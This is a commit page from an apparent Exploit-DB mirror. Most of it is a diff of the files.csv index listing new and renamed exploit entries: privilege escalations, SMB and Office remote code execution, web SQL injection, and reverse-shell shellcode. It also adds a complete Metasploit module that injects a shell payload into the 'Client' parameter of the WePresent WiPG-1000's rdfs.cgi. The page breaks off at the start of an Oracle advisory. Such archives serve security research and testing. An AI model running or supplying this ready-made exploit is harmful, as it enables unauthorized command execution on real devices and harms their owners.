bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-04-26

Browse source 
26 new exploits

PHP 5.4.0RC6 (x64t) - Denial of Service
PHP 5.4.0RC6 (x64) - Denial of Service

Evostream Media Server 1.7.1 (x64) - Denial of Service

PrivateTunnel Client 2.8 - Local Buffer Overflow (SEH)
VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation
VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write
Dmitry 1.3a - Local Buffer Overflow
Oracle VM VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation
Oracle VM VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write
Apple Safari - Array concat Memory Corruption
Oracle VirtualBox Guest Additions 5.1.18 -  Unprivileged Windows User-Mode Guest Code Double-Free
VirtualBox - Cooperating VMs can Escape from Shared Folder
PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Privilege Escalation
Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder
PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Privilege Escalation
VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy
VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config
VirtualBox 5.0.32 r112930 x64 - Windows Process COM Injection Privilege Escalation
Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy
Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config
Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation
Dell Customer Connect 1.3.28.0 - Privilege Escalation
LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation
Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation

Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit
Nginx 1.4.0 (Generic Linux x64) - Remote Exploit
Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution
Microsoft Office Word - Malicious Hta Execution (Metasploit)
WePresent WiPG-1000 - Command Injection (Metasploit)

OSX/Intel - setuid shell x86_64 Shellcode (51 bytes)
OSX/Intel (x86-64) - setuid shell  Shellcode (51 bytes)

OSX/Intel (x86_64) - reverse_tcp shell Shellcode (131 bytes)
OSX/Intel (x86-64) - reverse_tcp shell Shellcode (131 bytes)
Linux x86 / x86_64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)
Linux x86 / x86_64 - tcp_bind (Port 4444) Shellcode (251 bytes)
Linux x86 / x86_64 - Read /etc/passwd Shellcode (156 bytes)
Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)
Linux x86/x86-64 - tcp_bind (Port 4444) Shellcode (251 bytes)
Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)

Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
Linux/Windows/BSD x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)

Linux/x86-64 - Egghunter Shellcode (38 bytes)

Linux/x86-64 - Reverse Shell Shellcode (84 bytes)
FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery
WordPress Plugin KittyCatfish 2.2 - SQL Injection
WordPress Plugin Car Rental System 2.5 - SQL Injection
WordPress Plugin Wow Viral Signups 2.1 - SQL Injection
WordPress Plugin Wow Forms 2.1 - SQL Injection
Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE
Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection
HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion
OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution
Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection
October CMS 1.0.412 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2017-04-26 05:01:18 +00:00
parent dadce54852
commit 9e9bf495c2
29 changed files with 4163 additions and 91 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

57
files.csv
View file

@ -2129,7 +2129,7 @@ id,file,description,date,author,platform,type,port
18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0
18457,platforms/linux/dos/18457.py,"torrent-stats - httpd.c Denial of Service",2012-02-03,otr,linux,dos,0
18458,platforms/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 - htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos,0
18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (x64t) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0
18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (x64) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0
18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service",2012-02-04,"Senator of Pirates",windows,dos,0
18463,platforms/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",windows,dos,0
18469,platforms/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0
@ -5397,7 +5397,7 @@ id,file,description,date,author,platform,type,port
41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0
41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0
41547,platforms/win_x86-64/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",win_x86-64,dos,0
41565,platforms/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos,0
41596,platforms/windows/dos/41596.py,"Cerberus FTP Server 8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",windows,dos,0
41601,platforms/hardware/dos/41601.c,"MikroTik Router - ARP Table OverFlow Denial Of Service",2017-03-05,FarazPajohan,hardware,dos,0
@ -5442,6 +5442,7 @@ id,file,description,date,author,platform,type,port
41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0
41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0
41790,platforms/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0
41916,platforms/windows/dos/41916.py,"PrivateTunnel Client 2.8 - Local Buffer Overflow (SEH)",2017-04-25,Muhann4d,windows,dos,0
41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
@ -5471,9 +5472,12 @@ id,file,description,date,author,platform,type,port
41880,platforms/windows/dos/41880.cpp,"Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure",2017-04-13,"Google Security Research",windows,dos,0
41891,platforms/windows/dos/41891.rb,"Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010) (Metasploit)",2017-04-17,"Sean Dillon",windows,dos,445
41893,platforms/linux/dos/41893.txt,"pinfo 0.6.9 - Local Buffer Overflow",2017-04-18,"Nassim Asrir",linux,dos,0
41905,platforms/multiple/dos/41905.txt,"VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation",2017-04-20,"Google Security Research",multiple,dos,0
41906,platforms/multiple/dos/41906.txt,"VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write",2017-04-20,"Google Security Research",multiple,dos,0
41898,platforms/linux/dos/41898.txt,"Dmitry 1.3a - Local Buffer Overflow",2017-04-19,FarazPajohan,linux,dos,0
41905,platforms/multiple/dos/41905.txt,"Oracle VM VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation",2017-04-20,"Google Security Research",multiple,dos,0
41906,platforms/multiple/dos/41906.txt,"Oracle VM VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write",2017-04-20,"Google Security Research",multiple,dos,0
41911,platforms/windows/dos/41911.py,"Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)",2017-03-12,Muhann4d,windows,dos,0
41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0
41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8907,8 +8911,8 @@ id,file,description,date,author,platform,type,port
41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0
41542,platforms/windows/local/41542.c,"USBPcap 1.1.0.0 (WireShark 2.2.5) - Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local,0
41597,platforms/linux/local/41597.txt,"VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0
41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Privilege Escalation",2017-03-15,ReWolf,windows,local,0
41597,platforms/linux/local/41597.txt,"Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0
41605,platforms/win_x86-64/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Privilege Escalation",2017-03-15,ReWolf,win_x86-64,local,0
41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0
41619,platforms/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,windows,local,0
41675,platforms/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,android,local,0
@ -8950,9 +8954,12 @@ id,file,description,date,author,platform,type,port
41878,platforms/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application < 4.0.0.185 - Privilege Escalation",2017-04-13,hyp3rlinx,windows,local,0
41901,platforms/windows/local/41901.cs,"Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
41902,platforms/windows/local/41902.txt,"Microsoft Windows 10 - Runtime Broker ClipboardBroker Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
41904,platforms/multiple/local/41904.txt,"VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy",2017-04-20,"Google Security Research",multiple,local,0
41907,platforms/linux/local/41907.c,"VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",linux,local,0
41908,platforms/windows/local/41908.txt,"VirtualBox 5.0.32 r112930 x64 - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0
41904,platforms/multiple/local/41904.txt,"Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy",2017-04-20,"Google Security Research",multiple,local,0
41907,platforms/linux/local/41907.c,"Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",linux,local,0
41908,platforms/win_x86-64/local/41908.txt,"Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",win_x86-64,local,0
41917,platforms/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Privilege Escalation",2017-04-25,"Kacper Szurek",windows,local,0
41923,platforms/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation",2017-04-25,"G. Geshev",linux,local,0
41933,platforms/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -14017,7 +14024,7 @@ id,file,description,date,author,platform,type,port
32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0
33141,platforms/php/remote/33141.rb,"Alienvault Open Source SIEM (OSSIM) - SQL Injection / Remote Code Execution (Metasploit)",2014-05-02,Metasploit,php,remote,443
32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0
32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit",2014-03-15,sorbo,lin_x86-64,remote,0
32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (Generic Linux x64) - Remote Exploit",2014-03-15,sorbo,lin_x86-64,remote,0
30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0
30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0
30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0
@ -15462,6 +15469,9 @@ id,file,description,date,author,platform,type,port
41895,platforms/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote,0
41903,platforms/windows/remote/41903.txt,"Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution",2017-04-20,"Google Security Research",windows,remote,0
41910,platforms/linux/remote/41910.sh,"SquirrelMail < 1.4.22 - Remote Code Execution",2017-04-23,"Dawid Golunski",linux,remote,0
41929,platforms/windows/remote/41929.py,"Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution",2017-04-25,vportal,windows,remote,0
41934,platforms/windows/remote/41934.rb,"Microsoft Office Word - Malicious Hta Execution (Metasploit)",2017-04-25,Metasploit,windows,remote,0
41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15876,7 +15886,7 @@ id,file,description,date,author,platform,type,port
15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
15618,platforms/osx/shellcode/15618.c,"OSX/Intel - setuid shell x86_64 Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
15618,platforms/osx/shellcode/15618.c,"OSX/Intel (x86-64) - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0
15879,platforms/win_x86/shellcode/15879.txt,"Win32 - speaking Shellcode",2010-12-31,Skylined,win_x86,shellcode,0
16025,platforms/freebsd_x86/shellcode/16025.c,"FreeBSD/x86 - connect back Shellcode (81 bytes)",2011-01-21,Tosh,freebsd_x86,shellcode,0
@ -15884,7 +15894,7 @@ id,file,description,date,author,platform,type,port
16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0
17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) / chmod(_/etc/shadow__ 0666) / exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0
17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86_64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
17323,platforms/windows/shellcode/17323.c,"Windows - WinExec add new local administrator _RubberDuck_ + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0
@ -16004,9 +16014,9 @@ id,file,description,date,author,platform,type,port
39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
39336,platforms/linux/shellcode/39336.c,"Linux x86 / x86_64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39337,platforms/linux/shellcode/39337.c,"Linux x86 / x86_64 - tcp_bind (Port 4444) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39338,platforms/linux/shellcode/39338.c,"Linux x86 / x86_64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind (Port 4444) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download & Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0
@ -16034,7 +16044,7 @@ id,file,description,date,author,platform,type,port
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
39900,platforms/win_x86/shellcode/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
39901,platforms/lin_x86/shellcode/39901.c,"Linux/x86 - /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)",2016-06-07,sajith,lin_x86,shellcode,0
39914,platforms/win_x86/shellcode/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
@ -16078,10 +16088,10 @@ id,file,description,date,author,platform,type,port
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux - TCP Reverse Shell Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0
41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0
41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
41439,platforms/lin_x86-64/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,lin_x86-64,shellcode,0
41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
@ -37767,3 +37777,14 @@ id,file,description,date,author,platform,type,port
41885,platforms/php/webapps/41885.txt,"Concrete5 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps,0
41890,platforms/php/webapps/41890.txt,"Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset",2017-04-16,hyp3rlinx,php,webapps,0
41900,platforms/multiple/webapps/41900.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
41918,platforms/php/webapps/41918.txt,"FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-25,"Cyril Vallicari",php,webapps,0
41919,platforms/php/webapps/41919.txt,"WordPress Plugin KittyCatfish 2.2 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80
41920,platforms/php/webapps/41920.txt,"WordPress Plugin Car Rental System 2.5 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80
41921,platforms/php/webapps/41921.txt,"WordPress Plugin Wow Viral Signups 2.1 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80
41922,platforms/php/webapps/41922.txt,"WordPress Plugin Wow Forms 2.1 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80
41925,platforms/xml/webapps/41925.txt,"Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE",2017-04-25,ERPScan,xml,webapps,0
41926,platforms/jsp/webapps/41926.txt,"Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection",2017-04-25,ERPScan,jsp,webapps,0
41927,platforms/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",multiple,webapps,0
41928,platforms/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps,0
41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80

Can't render this file because it is too large.

74
platforms/hardware/remote/41935.rb Executable file
View file

@ -0,0 +1,74 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'WePresent WiPG-1000 Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in an undocumented
CGI file in several versions of the WePresent WiPG-1000 devices.
Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matthias Brun', # Vulnerability Discovery, Metasploit Module
],
'References' =>
[
[ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat openssl'
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['WiPG-1000 <=2.0.0.7', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 20 2017',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => '/cgi-bin/rdfs.cgi'
})
if res && res.body.include?("Follow administrator instructions to enter the complete path")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_status('Sending request')
send_request_cgi(
'method' => 'POST',
'uri' => '/cgi-bin/rdfs.cgi',
'vars_post' => {
'Client' => ";#{payload.encoded};",
'Download' => 'Download'
}
)
end
end

186
platforms/jsp/webapps/41926.txt Executable file
View file

@ -0,0 +1,186 @@
Application: Oracle E-Business Suite
